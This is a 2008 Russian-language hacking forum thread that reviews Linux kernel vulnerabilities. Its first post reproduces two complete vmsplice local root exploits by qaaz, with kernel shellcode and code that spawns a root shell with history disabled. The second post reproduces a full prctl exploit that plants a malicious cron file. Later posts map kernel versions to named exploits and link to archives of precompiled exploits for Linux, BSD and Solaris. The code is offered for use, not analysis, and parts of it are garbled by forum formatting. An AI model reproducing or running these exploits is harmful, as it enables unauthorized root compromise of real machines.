[ Обзор уязвимостей Linux Kernel ]

Discussion in 'Безопасность и Анонимность' started by FraiDex, 10 Feb 2008.

  1. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit​

    PHP:
    /*
     * diane_lane_fucked_hard.c
     *
     * Linux vmsplice Local Root Exploit
     * By qaaz
     *
     * Linux 2.6.23 - 2.6.24
     */
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <errno.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/uio.h>

    #define TARGET_PATTERN        " sys_vm86old"
    #define TARGET_SYSCALL        113

    #ifndef __NR_vmsplice
    #define __NR_vmsplice        316
    #endif

    #define _vmsplice(fd,io,nr,fl)    syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
    #define gimmeroot()        syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)

    #define TRAMP_CODE        (void *) trampoline    
    #define TRAMP_SIZE        ( sizeof(trampoline) - 1 )

    unsigned char trampoline[] =
    "\x8b\x5c\x24\x04"        /* mov    0x4(%esp),%ebx    */
    "\x8b\x4c\x24\x08"        /* mov    0x8(%esp),%ecx    */
    "\x81\xfb\x69\x7a\x00\x00"    /* cmp    $31337,%ebx        */
    "\x75\x02"            /* jne    +2            */
    "\xff\xd1"            /* call   *%ecx            */
    "\xb8\xea\xff\xff\xff"        /* mov    $-EINVAL,%eax        */
    "\xc3"                /* ret                */
    ;

    void    die(char *msgint err)
    {
        
    printf(err "[-] %s: %s\n" "[-] %s\n"msgstrerror(err));
        
    fflush(stdout);
        
    fflush(stderr);
        exit(
    1);
    }

    long    get_target()
    {
        
    FILE    *f;
        
    long    addr 0;
        
    char    line[128];

        
    fopen("/proc/kallsyms""r");
        if (!
    f) die("/proc/kallsyms"errno);

        while (
    fgets(linesizeof(line), f)) {
            if (
    strstr(lineTARGET_PATTERN)) {
                
    addr strtoul(lineNULL16);
                break;
            }
        }

        
    fclose(f);
        return 
    addr;
    }

    static 
    inline __attribute__((always_inline))
    void *    get_current()
    {
        
    unsigned long curr;
        
    __asm__ __volatile__ (
        
    "movl %%esp, %%eax ;"
        "andl %1, %%eax ;"
        "movl (%%eax), %0"
        
    "=r" (curr)
        : 
    "i" (~8191)
        );
        return (
    void *) curr;
    }

    static 
    uint uidgid;

    void    kernel_code()
    {
        
    int    i;
        
    uint    *get_current();

        for (
    01024-13i++) {
            if (
    p[0] == uid && p[1] == uid &&
                
    p[2] == uid && p[3] == uid &&
                
    p[4] == gid && p[5] == gid &&
                
    p[6] == gid && p[7] == gid) {
                
    p[0] = p[1] = p[2] = p[3] = 0;
                
    p[4] = p[5] = p[6] = p[7] = 0;
                
    = (uint *) ((char *)(8) + sizeof(void *));
                
    p[0] = p[1] = p[2] = ~0;
                break;
            }
            
    p++;
        }    
    }

    int    main(int argcchar *argv[])
    {
        
    int        pi[2];
        
    long        addr;
        
    struct iovec    iov;

        
    uid getuid();
        
    gid getgid();
        
    setresuid(uiduiduid);
        
    setresgid(gidgidgid);

        
    printf("-----------------------------------\n");
        
    printf(" Linux vmsplice Local Root Exploit\n");
        
    printf(" By qaaz\n");
        
    printf("-----------------------------------\n");

        if (!
    uid || !gid)
            die(
    "!@#$"0);

        
    addr get_target();
        
    printf("[+] addr: 0x%lx\n"addr);

        if (
    pipe(pi) < 0)
            die(
    "pipe"errno);

        
    iov.iov_base = (void *) addr;
        
    iov.iov_len  TRAMP_SIZE;

        
    write(pi[1], TRAMP_CODETRAMP_SIZE);
        
    _vmsplice(pi[0], &iov10);

        
    gimmeroot();

        if (
    getuid() != 0)
            die(
    "wtf"0);

        
    printf("[+] root\n");
        
    putenv("HISTFILE=/dev/null");
        
    execl("/bin/bash""bash""-i"NULL);
        die(
    "/bin/bash"errno);
        return 
    0;
    }

    // milw0rm.com [2008-02-09]

    Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit​

    PHP:
    /*
     * jessica_biel_naked_in_my_bed.c
     *
     * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
     * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
     * Stejnak je to stare jak cyp a aj jakesyk rozbite.
     *
     * Linux vmsplice Local Root Exploit
     * By qaaz
     *
     * Linux 2.6.17 - 2.6.24.1
     *
     * This is quite old code and I had to rewrite it to even compile.
     * It should work well, but I don't remeber original intent of all
     * the code, so I'm not 100% sure about it. You've been warned ;)
     * 
     * -static -Wno-format  
     */
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <errno.h>
    #include <stdlib.h>
    #include <string.h>
    #include <malloc.h>
    #include <limits.h>
    #include <signal.h>
    #include <unistd.h>
    #include <sys/uio.h>
    #include <sys/mman.h>
    #include <asm/page.h>
    #define __KERNEL__
    #include <asm/unistd.h>

    #define PIPE_BUFFERS    16
    #define PG_compound    14
    #define uint        unsigned int
    #define static_inline    static inline __attribute__((always_inline))
    #define STACK(x)    (x + sizeof(x) - 40)

    struct page {
        
    unsigned long flags;
        
    int count;
        
    int mapcount;
        
    unsigned long private;
        
    void *mapping;
        
    unsigned long index;
        
    struct long nextprev; } lru;
    };

    void    exit_code();
    char    exit_stack[1024 1024];

    void    die(char *msgint err)
    {
        
    printf(err "[-] %s: %s\n" "[-] %s\n"msgstrerror(err));
        
    fflush(stdout);
        
    fflush(stderr);
        exit(
    1);
    }

    #if defined (__i386__)

    #ifndef __NR_vmsplice
    #define __NR_vmsplice    316
    #endif

    #define USER_CS        0x73
    #define USER_SS        0x7b
    #define USER_FL        0x246

    static_inline
    void    exit_kernel
    ()
    {
        
    __asm__ __volatile__ (
        
    "movl %0, 0x10(%%esp) ;"
        "movl %1, 0x0c(%%esp) ;"
        "movl %2, 0x08(%%esp) ;"
        "movl %3, 0x04(%%esp) ;"
        "movl %4, 0x00(%%esp) ;"
        "iret"
        
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            
    "i" (USER_CS), "r" (exit_code)
        );
    }

    static_inline
    void 
    *    get_current()
    {
        
    unsigned long curr;
        
    __asm__ __volatile__ (
        
    "movl %%esp, %%eax ;"
        "andl %1, %%eax ;"
        "movl (%%eax), %0"
        
    "=r" (curr)
        : 
    "i" (~8191)
        );
        return (
    void *) curr;
    }

    #elif defined (__x86_64__)

    #ifndef __NR_vmsplice
    #define __NR_vmsplice    278
    #endif

    #define USER_CS        0x23
    #define USER_SS        0x2b
    #define USER_FL        0x246

    static_inline
    void    exit_kernel
    ()
    {
        
    __asm__ __volatile__ (
        
    "swapgs ;"
        "movq %0, 0x20(%%rsp) ;"
        "movq %1, 0x18(%%rsp) ;"
        "movq %2, 0x10(%%rsp) ;"
        "movq %3, 0x08(%%rsp) ;"
        "movq %4, 0x00(%%rsp) ;"
        "iretq"
        
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            
    "i" (USER_CS), "r" (exit_code)
        );
    }

    static_inline
    void 
    *    get_current()
    {
        
    unsigned long curr;
        
    __asm__ __volatile__ (
        
    "movq %%gs:(0), %0"
        
    "=r" (curr)
        );
        return (
    void *) curr;
    }

    #else
    #error "unsupported arch"
    #endif

    #if defined (_syscall4)
    #define __NR__vmsplice    __NR_vmsplice
    _syscall4(
        
    long_vmsplice,
        
    intfd,
        
    struct iovec *, iov,
        
    unsigned longnr_segs,
        
    unsigned intflags)

    #else
    #define _vmsplice(fd,io,nr,fl)    syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
    #endif

    static uint uidgid;

    void    kernel_code()
    {
        
    int    i;
        
    uint    *get_current();

        for (
    01024-13i++) {
            if (
    p[0] == uid && p[1] == uid &&
                
    p[2] == uid && p[3] == uid &&
                
    p[4] == gid && p[5] == gid &&
                
    p[6] == gid && p[7] == gid) {
                
    p[0] = p[1] = p[2] = p[3] = 0;
                
    p[4] = p[5] = p[6] = p[7] = 0;
                
    = (uint *) ((char *)(8) + sizeof(void *));
                
    p[0] = p[1] = p[2] = ~0;
                break;
            }
            
    p++;
        }    

        
    exit_kernel();
    }

    void    exit_code()
    {
        if (
    getuid() != 0)
            die(
    "wtf"0);

        
    printf("[+] root\n");
        
    putenv("HISTFILE=/dev/null");
        
    execl("/bin/bash""bash""-i"NULL);
        die(
    "/bin/bash"errno);
    }

    int    main(int argcchar *argv[])
    {
        
    int        pi[2];
        
    size_t        map_size;
        
    char *        map_addr;
        
    struct iovec    iov;
        
    struct page *    pages[5];

        
    uid getuid();
        
    gid getgid();
        
    setresuid(uiduiduid);
        
    setresgid(gidgidgid);

        
    printf("-----------------------------------\n");
        
    printf(" Linux vmsplice Local Root Exploit\n");
        
    printf(" By qaaz\n");
        
    printf("-----------------------------------\n");

        if (!
    uid || !gid)
            die(
    "!@#$"0);

        
    /*****/
        
    pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
        
    pages[1] = pages[0] + 1;

        
    map_size PAGE_SIZE;
        
    map_addr mmap(pages[0], map_sizePROT_READ PROT_WRITE,
                        
    MAP_FIXED MAP_PRIVATE MAP_ANONYMOUS, -10);
        if (
    map_addr == MAP_FAILED)
            die(
    "mmap"errno);

        
    memset(map_addr0map_size);
        
    printf("[+] mmap: 0x%lx .. 0x%lx\n"map_addrmap_addr map_size);
        
    printf("[+] page: 0x%lx\n"pages[0]);
        
    printf("[+] page: 0x%lx\n"pages[1]);

        
    pages[0]->flags    << PG_compound;
        
    pages[0]->private  = (unsigned longpages[0];
        
    pages[0]->count    1;
        
    pages[1]->lru.next = (longkernel_code;

        
    /*****/
        
    pages[2] = *(void **) pages[0];
        
    pages[3] = pages[2] + 1;

        
    map_size PAGE_SIZE;
        
    map_addr mmap(pages[2], map_sizePROT_READ PROT_WRITE,
                        
    MAP_FIXED MAP_PRIVATE MAP_ANONYMOUS, -10);
        if (
    map_addr == MAP_FAILED)
            die(
    "mmap"errno);

        
    memset(map_addr0map_size);
        
    printf("[+] mmap: 0x%lx .. 0x%lx\n"map_addrmap_addr map_size);
        
    printf("[+] page: 0x%lx\n"pages[2]);
        
    printf("[+] page: 0x%lx\n"pages[3]);

        
    pages[2]->flags    << PG_compound;
        
    pages[2]->private  = (unsigned longpages[2];
        
    pages[2]->count    1;
        
    pages[3]->lru.next = (longkernel_code;

        
    /*****/
        
    pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
        
    map_size PAGE_SIZE;
        
    map_addr mmap(pages[4], map_sizePROT_READ PROT_WRITE,
                        
    MAP_FIXED MAP_PRIVATE MAP_ANONYMOUS, -10);
        if (
    map_addr == MAP_FAILED)
            die(
    "mmap"errno);
        
    memset(map_addr0map_size);
        
    printf("[+] mmap: 0x%lx .. 0x%lx\n"map_addrmap_addr map_size);
        
    printf("[+] page: 0x%lx\n"pages[4]);

        
    /*****/
        
    map_size = (PIPE_BUFFERS 2) * PAGE_SIZE;
        
    map_addr mmap(NULLmap_sizePROT_READ PROT_WRITE,
                        
    MAP_PRIVATE MAP_ANONYMOUS, -10);
        if (
    map_addr == MAP_FAILED)
            die(
    "mmap"errno);

        
    memset(map_addr0map_size);
        
    printf("[+] mmap: 0x%lx .. 0x%lx\n"map_addrmap_addr map_size);

        
    /*****/
        
    map_size -= PAGE_SIZE;
        if (
    munmap(map_addr map_sizePAGE_SIZE) < 0)
            die(
    "munmap"errno);

        
    /*****/
        
    if (pipe(pi) < 0) die("pipe"errno);
        
    close(pi[0]);

        
    iov.iov_base map_addr;
        
    iov.iov_len  ULONG_MAX;

        
    signal(SIGPIPEexit_code);
        
    _vmsplice(pi[1], &iov10);
        die(
    "vmsplice"errno);
        return 
    0;
    }

    // milw0rm.com [2008-02-09]
     
    1 person likes this.
  2. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    [ Обзор уязвимостей Linux Kernel ]

    Офф.сайт www.linux.org

    Linux Kernel 2.4.21-grsecure

    http://packetstormsecurity.nl/0209-exploits/autolinuxconf.tgz

    Linux Kernel 2.6.13 - 2.6.17.4

    Exploit:

    Code:
    #include <sys/types.h>
    #include <sys/time.h>
    #include <sys/resource.h>
    #include <sys/prctl.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <errno.h>
    #include <signal.h>
    #include <stdlib.h>
    #include <time.h>
    
    #define CROND "/etc/cron.d"
    #define BUFSIZE 2048
    
    
    struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
    
    char crontemplate[]=
    "#/etc/cron.d/core suid_dumpable exploit\n"
    "SHELL=/bin/sh\n"
    "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
    "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
    
    char cronstring[BUFSIZE];
    char fname[BUFSIZE];
    
    struct timeval te;
    
    void sh(int sn) {
    execl(fname, fname, (char *) NULL);
    }
    
    
    int main(int argc, char *argv[]) {
    
    int nw, pid;
    
    if (geteuid() == 0) {
    printf("[+] getting root shell\n");
    setuid(0);
    setgid(0);
    if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
    perror("[-] execle");
    return 1;
    }
    }
    
    printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");
    
    /* get our file name */
    if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
    perror("[-] readlink");
    printf("This is not fatal, rewrite the exploit\n");
    }
    
    if (signal(SIGUSR1, sh) == SIG_ERR) {
    perror("[-] signal");
    return 1;
    }
    printf("[+] Installed signal handler\n");
    
    /* Let us create core files */
    setrlimit(RLIMIT_CORE, &myrlimit);
    if (chdir(CROND) == -1) {
    perror("[-] chdir");
    return 1;
    }
    
    /* exploit the flaw */
    if (prctl(PR_SET_DUMPABLE, 2) == -1) {
    perror("[-] prtctl");
    printf("Is you kernel version >= 2.6.13 ?\n");
    return 1;
    }
    
    printf("[+] We are suidsafe dumpable!\n");
    
    /* Forge the string for our core dump */
    nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
    if (nw >= sizeof(cronstring)) {
    printf("[-] cronstring is too small\n");
    return 1;
    }
    printf("[+] Malicious string forged\n");
    
    if ((pid=fork()) == -1) {
    perror("[-] fork");
    return 1;
    }
    
    if (pid == 0) {
    /* This is not the good way to do it ;) */
    sleep(120);
    exit(0);
    }
    
    /* SEGFAULT the child */
    printf("[+] Segfaulting child\n");
    if (kill(pid, 11) == -1) {
    perror("[-] kill");
    return 1;
    }
    if (gettimeofday(&te, NULL) == 0) 
    printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
    sleep(120);
    
    printf("[-] It looks like the exploit failed\n");
    
    return 1;
    }
    

    Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit
    Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit
    Linux Kernel < 2.6.11.5 BLUETOOTH Stack Local Root Exploit
    Linux Kernel 2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)
    Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit
    Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit
    Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)
    Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)
    Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)
    Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)
    Linux Kernel 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)
    Linux Kernel 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit
    Linux Kernel 2.4 uselib() Privilege Elevation Exploit
    Linux Kernel <= 2.4.29-rc2 uselib() Privilege Elevation
    Linux Kernel 2.x mremap missing do_munmap Exploit
    Linux Kernel 2.4.x mremap() bound checking Root Exploit
    Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (working)
    Linux Kernel < 2.4.20 Module Loader Local Root Exploit
    Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit


    (c) (c) (c)

    zythar: закрепил. плюсануть не могу (*
     
    #2 ~!DoK_tOR!~, 15 Jul 2008
    Last edited: 20 Jul 2008
    2 people like this.
  3. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Kernel List:​


    Code:
    2.2.*     -> ptrace, ptrace_kmod, kmod
    2.4.17    -> newlocal, kmod, uselib24 
    2.4.18    -> brk, brk2, newlocal, kmod 
    2.4.19    -> brk, brk2, newlocal, kmod 
    2.4.20    -> ptrace, kmod, ptrace-kmod, brk, brk2 
    2.4.21    -> brk, brk2, ptrace, ptrace-kmod 
    2.4.22    -> brk, brk2, ptrace, ptrace-kmod 
    2.4.22-10 -> loginx 
    2.4.23    -> mremap_pte 
    2.4.24    -> mremap_pte, uselib24, mremap
    2.4.25-1  -> uselib24
    2.4.27    -> uselib24
    2.4.29    -> uselib24
    2.6.2     -> mremap_pte, krad, h00lyshit, bluetooth_stack
    2.6.5     -> krad, krad2, krad3, h00lyshit, bluetooth_stack
    2.6.6     -> krad, krad2, krad3, h00lyshit, bluetooth_stack
    2.6.7     -> krad, krad2, krad3, h00lyshit, bluetooth_stack
    2.6.8     -> krad, krad2, krad3, h00lyshit, bluetooth_stack
    2.6.8-5   -> krad2, krad3, h00lyshit, bluetooth_stack
    2.6.9     -> krad, krad2, krad3, h00lyshit, bluetooth_stack
    2.6.9-34  -> r00t, h00lyshit, bluetooth_stack
    2.6.10    -> krad, krad2, krad3, h00lyshit, bluetooth_stack
    2.6.13    -> raptor, raptor2, h0llyshit, prctl 
    2.6.14    -> raptor, raptor2, h0llyshit, prctl 
    2.6.15    -> raptor, raptor2, h0llyshit, prctl 
    2.6.16    -> raptor, raptor2, h0llyshit, prctl
    2.6.17    -> jessica_biel_naked_in_my_bed
    2.6.24.1  -> jessica_biel_naked_in_my_bed
    2.6.23    -> diane_lane_fucked_hard
    2.6.24    -> diane_lane_fucked_hard
    Сайты со скомпиленными сплойтами:

    http://someshit.net/files/xpl/
    http://phpshell.by.ru/exploits/
    http://jshooter.by.ru/xpl/

    Архив со скомпиленными сплойтами(собраные с сайтов выше каждый сплойт в отдельной папке):

    http://oneline.ucoz.ru/exploit.tar.gz
     
    #3 ~!DoK_tOR!~, 15 Jul 2008
    Last edited by a moderator: 25 Jul 2008
  4. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    милвормовская сборка :(

    Code:
    Linux
    Common
    Linux 2.2.x ->Linux kernel ptrace/kmod local root exploit (http://milw0rm.com/exploits/3)
    Linux 2.2.x (on exported files, should be vuln) (http://milw0rm.com/exploits/718)
    Linux <= 2.2.25 ->Linux Kernel 2.x mremap missing do_munmap Exploit (http://milw0rm.com/exploits/160)
    
    Linux 2.4.x ->Linux kernel ptrace/kmod local root exploit (http://milw0rm.com/exploits/3)
    Linux 2.4.x -> pwned.c – Linux 2.4 and 2.6 sys_uselib local root exploit (http://milw0rm.com/exploits/895)
    Linux 2.4.x ->Linux kernel 2.4 uselib() privilege elevation exploit (http://milw0rm.com/exploits/778)
    Linux 2.4.20 ->Linux Kernel Module Loader Local R00t Exploit (http://milw0rm.com/exploits/12)
    Linux <= 2.4.22 ->Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (http://milw0rm.com/exploits/131)
    Linux 2.4.22 ->Linux Kernel 2.4.22 “do_brk()” local Root Exploit (PoC) (http://milw0rm.com/exploits/129)
    Linux <= 2.4.24 ->Linux Kernel 2.x mremap missing do_munmap Exploit (http://milw0rm.com/exploits/160)
    Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) (http://milw0rm.com/exploits/718)
    
    Linux <= 2.6.2 ->Linux Kernel 2.x mremap missing do_munmap Exploit (http://milw0rm.com/exploits/160)
    Linux 2.6.11 -> Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c) (http://milw0rm.com/exploits/1397)
    Linux 2.6.13 <= 2.6.17.4 -> Linux Kernel 2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate) (http://milw0rm.com/exploits/2031)
    Linux 2.6.13 <= 2.6.17.4 -> Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (http://milw0rm.com/exploits/2011)
    Linux 2.6.11 <= 2.6.17.4 -> h00lyshit.c -Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit (http://milw0rm.com/exploits/2013)
    Linux 2.6.x < 2.6.7-rc3 (default configuration) (http://milw0rm.com/exploits/718)
    Linux 2.6.x -> pwned.c – Linux 2.4 and 2.6 sys_uselib local root exploit (http://milw0rm.com/exploits/895)
    
    Debian
    Debian 2.2 ->/usr/bin/pileup Local Root Exploit (http://milw0rm.com/exploits/1170)
    
    Ubuntu
    Ubuntu Breezy 5.10 Installer Password Disclosure Vulnerability (http://milw0rm.com/exploits/1579)
    
    Slackware
    Slackware 7.1 ->/usr/bin/Mail Exploit (http://milw0rm.com/exploits/285)
    
    Mandrake
    Mandrake 8.2 -> /usr/mail local exploit (http://milw0rm.com/exploits/40)
    Mandrake <= 10.2 -> cdrdao Local Root Exploit (http://milw0rm.com/exploits/997)
    
    Suse
    SuSE Linux 9.1 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299)
    SuSE Linux 9.2 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299)
    SuSE Linux 9.3 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299)
    SuSE Linux 10.0 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299)
    SuSE Linux Enterprise Server 8 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299)
    SuSE Linux Enterprise Server 9 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299)
    
    BSD
    Freebsd
    Freebsd 3.5.1 ->Ports package local root (http://milw0rm.com/exploits/286)
    Freebsd 4.2 ->Ports package local root (http://milw0rm.com/exploits/286)
    FreeBSD 4.x <= 5.4) master.passwd Disclosure Exploit (http://milw0rm.com/exploits/1311)
    
    Openbsd
    Openbsd 2.x – 3.3 ->exec_ibcs2_coff_prep_zmagic() Kernel Exploit (http://milw0rm.com/exploits/125)
    OpenBSD 3.x-4.0 ->vga_ioctl() root exploit (http://milw0rm.com/exploits/3094)
    
    Sun-Microsystems
    Solaris
    Solaris 2.4 ->lion24.c (http://milw0rm.com/exploits/328)
    Solaris 2.6 with 107733-10 and without 107733-11 (http://milw0rm.com/exploits/1182)
    Solaris 2.6 with 107733-10 and without 107733-11 (http://milw0rm.com/exploits/1182)
    Solaris 5.5.1 ->X11R6.3 xterm (http://milw0rm.com/exploits/338)
    Solaris 7 with 106950-14 through 106950-22 and without 106950-23 (http://milw0rm.com/exploits/1182)
    Solaris 7 with 106950-14 through 106950-22 and without 106950-23 (http://milw0rm.com/exploits/1182)
    Solaris 7 without patch 107178-03 (http://milw0rm.com/exploits/714)
    Solaris 7 without patch 107178-03 (http://milw0rm.com/exploits/713)
    Solaris 8 without patch 108949-08 (http://milw0rm.com/exploits/713)
    Solaris 8 without patch 108949-08 (http://milw0rm.com/exploits/714)
    Solaris 8 with 109147-07 through 109147-24 and without 109147-25 (http://milw0rm.com/exploits/1182)
    Solaris 8 with 108993-14 through 108993-31 and without 108993-32 (http://milw0rm.com/exploits/715)
    Solaris 8 with 109147-07 through 109147-24 and without 109147-25 (http://milw0rm.com/exploits/1182)
    Solaris 8 with 108993-14 through 108993-31 and without 108993-32 (http://milw0rm.com/exploits/715)
    Solaris 9 without patch 116308-01 (http://milw0rm.com/exploits/714)
    Solaris 9 without patch 116308-01 (http://milw0rm.com/exploits/713)
    Solaris 9 without 113476-11 (http://milw0rm.com/exploits/715)
    Solaris 9 without 112963-09 (http://milw0rm.com/exploits/1182)
    Solaris 9 without 113476-11 (http://milw0rm.com/exploits/715)
    Solaris 9 without 112963-09 (http://milw0rm.com/exploits/1182)
    Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit (http://milw0rm.com/exploits/2543)
    Solaris 10 (libnspr) constructor Local Root Exploit (http://milw0rm.com/exploits/2641)
    
    SunOS
    SunOS 5.10 Generic i86pc i386 i86pc (http://milw0rm.com/exploits/1073)
    SunOS 5.9 Generic_112233-12 sun4u (http://milw0rm.com/exploits/1073)
     
    2 people like this.
Loading...